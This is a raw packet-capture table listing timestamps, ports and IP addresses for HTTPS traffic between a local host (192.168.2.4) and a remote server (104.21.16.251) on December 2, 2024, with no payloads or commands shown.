Dec 2, 2024 18:41:13.171060085 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.171221018 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.177464962 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.177592039 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.180905104 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.181118965 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.186850071 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.186986923 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.190278053 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.190387011 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.196414948 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.196533918 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.202863932 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.202992916 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.209058046 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.209189892 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.212486029 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.212699890 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.218482018 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.218616009 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.749552011 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.749572039 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.749589920 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.749614954 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.749641895 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.749654055 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.749677896 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.753817081 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.753834963 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.753879070 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.753885984 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.753909111 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.753927946 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.769664049 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.769681931 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.769720078 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.769727945 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.769738913 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.769768953 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.791467905 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.791495085 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.791536093 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.791544914 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.791554928 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.791578054 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.810657978 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.810681105 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.810739040 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.810745001 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.810777903 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.810796022 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.833960056 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.833975077 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.834017992 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.834028959 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.834055901 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.834064960 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.852989912 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.853009939 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.853056908 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.853065014 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.853095055 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.853118896 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.886856079 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.886878967 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.886917114 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.886925936 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.886964083 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.886981964 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.908298016 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.908317089 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.908358097 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.908369064 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.908396006 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.908417940 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.928884029 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.928906918 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.928951979 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.928958893 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.928989887 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.929003954 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.951136112 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.951153994 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.951196909 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.951205015 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.951260090 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.969790936 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.969808102 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.969846964 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.969852924 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.969893932 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.969914913 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.991751909 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.991774082 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.991811037 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.991816044 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:13.991852045 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:13.991871119 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.012201071 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.012219906 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.012259007 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.012264013 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.012298107 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.012315035 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.020562887 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.020579100 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.020618916 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.020627022 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.020663023 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.020687103 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.028841972 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.028861046 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.028898001 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.028904915 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.028935909 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.028958082 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.036395073 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.036417961 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.036454916 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.036463022 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.036499023 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.036518097 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.045895100 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.045911074 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.045950890 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.045955896 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.046000957 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.055461884 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.055502892 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.055521965 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.055529118 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.055567980 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.065216064 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.065232038 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.065273046 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.065279961 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.065318108 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.065337896 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.077307940 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.077323914 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.077357054 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.077363014 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.077389956 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.077404976 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.087505102 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.087521076 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.087551117 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.087591887 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.087596893 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.087636948 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.096791029 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.096817017 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.096858978 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.096864939 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.096895933 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.096910000 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.106514931 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.106530905 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.106565952 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.106574059 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.106605053 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.106618881 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.119080067 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.119098902 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.119149923 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.119157076 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.119208097 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.132409096 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.132426977 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.132466078 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.132512093 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.132517099 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.132545948 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.137551069 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.137577057 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.137617111 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.137623072 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.137645006 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.137658119 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.145706892 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.145721912 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.145751953 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.145757914 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.145786047 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.145795107 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.151556969 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.151572943 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.151621103 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.151628017 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.151665926 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.151678085 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.158457041 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.158473969 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.158512115 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.158520937 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.158549070 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.158571005 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.164710045 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.164726973 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.164776087 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.164783955 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.164818048 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.164834976 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.168629885 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.168661118 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.168709993 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.168720007 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.168744087 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.168764114 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.174520969 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.174537897 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.174586058 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.174593925 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.174624920 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.174655914 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.180478096 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.180494070 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.180529118 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.180536032 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.180567980 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.180567980 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.184873104 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.184889078 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.184937954 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.184943914 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.184984922 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.189827919 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.189842939 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.189889908 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.189897060 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.189935923 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.193749905 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.193767071 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.193809986 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.193816900 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.193862915 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.198018074 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.198040962 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.198081017 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.198086977 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.198117971 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.198126078 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.202078104 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.202109098 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.202130079 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.202136040 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.202158928 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.202176094 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.203963041 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.204014063 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.204020977 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.204037905 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.204063892 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.204092979 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.204150915 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.204161882 CET	443	49891	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.204175949 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.204200029 CET	49891	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.207541943 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.207577944 CET	443	49904	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:14.207637072 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.207942009 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:14.207954884 CET	443	49904	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:15.457110882 CET	443	49904	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:15.460308075 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:15.460308075 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:15.460335970 CET	443	49904	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:17.036286116 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:17.036315918 CET	443	49904	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:17.893045902 CET	443	49904	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:17.893105984 CET	443	49904	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:17.893110991 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:17.893125057 CET	443	49904	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:17.893146038 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:17.893187046 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:17.893444061 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:17.893491030 CET	443	49904	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:17.893537045 CET	49904	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:17.982543945 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:17.982598066 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:17.982659101 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:17.983186960 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:17.983200073 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:19.294675112 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:19.294816017 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:20.864234924 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:20.864234924 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:20.864269018 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:20.864283085 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:20.864618063 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:20.864682913 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.232724905 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.232774019 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.232800961 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.232812881 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.232821941 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.232835054 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.232891083 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.232902050 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.233104944 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.233423948 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.233530045 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.233536959 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.233596087 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.240434885 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.241405010 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.241415024 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.241652012 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.249062061 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.249128103 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.249141932 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.249311924 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.353581905 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.353641987 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.353715897 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.353847027 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.437263966 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.437391043 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.441257000 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.441318989 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.442888975 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.442965031 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.451200008 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.451256990 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.451275110 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.451379061 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.459506989 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.459702969 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.459717035 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.463413000 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.468396902 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.468581915 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.468589067 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.468642950 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.476572037 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.476650000 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.484822035 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.484894991 CET	443	49914	104.21.16.251	192.168.2.4
Dec 2, 2024 18:41:21.484894991 CET	49914	443	192.168.2.4	104.21.16.251
Dec 2, 2024 18:41:21.484916925 CET	443	49914	104.21.16.251	192.168.2.4
